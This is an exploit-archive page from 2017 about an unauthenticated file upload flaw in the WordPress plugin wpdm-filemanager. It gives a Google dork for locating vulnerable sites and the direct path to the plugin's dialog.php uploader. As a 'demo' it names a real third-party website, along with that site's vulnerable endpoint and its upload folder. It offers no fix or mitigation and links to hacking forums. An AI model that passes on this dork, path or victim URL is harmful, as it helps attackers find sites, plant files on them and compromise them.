Wordpress plugins wpdm-filemanager upload File Vulnerability

2017.05.14

sohaip-hackerDZ (DZ)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:wpdm-filemanager/

#################################################################################
# Exploit Title : Wordpress plugins wpdm-filemanager upload File Vulnerability
# Author : sohaip-hackerDZ
# Google Dork : inurl:wpdm-filemanager/
# Date : 2017-05-12
# Tested on : linux mint
#################################################################################
#
# [+] Exploit : http://127.0.0.1//wp-content/plugins/wpdm-filemanager/filemanager/dialog.php
#
# [+] File Location :https://www.bac.org.tn/wp-admin/images/Your File
#
#################################################################################
#
# Demo :
#
# https://www.bac.org.tn/wp-content/plugins/wpdm-filemanager/filemanager/dialog.php
#
#################################################################################
# fp >> https://www.facebook.com/sohaipbarika/
# forum >> http://www.spyhackerz.com/forum/
# web site http://www.tools-hack.com/
# Discovered By: sohaip-hackerDZ

References:

http://www.tools-hack.com/2017/05/exploit-wordpress-plugins-wpdm.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Wordpress plugins wpdm-filemanager upload File Vulnerability

Dork: inurl:wpdm-filemanager/

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.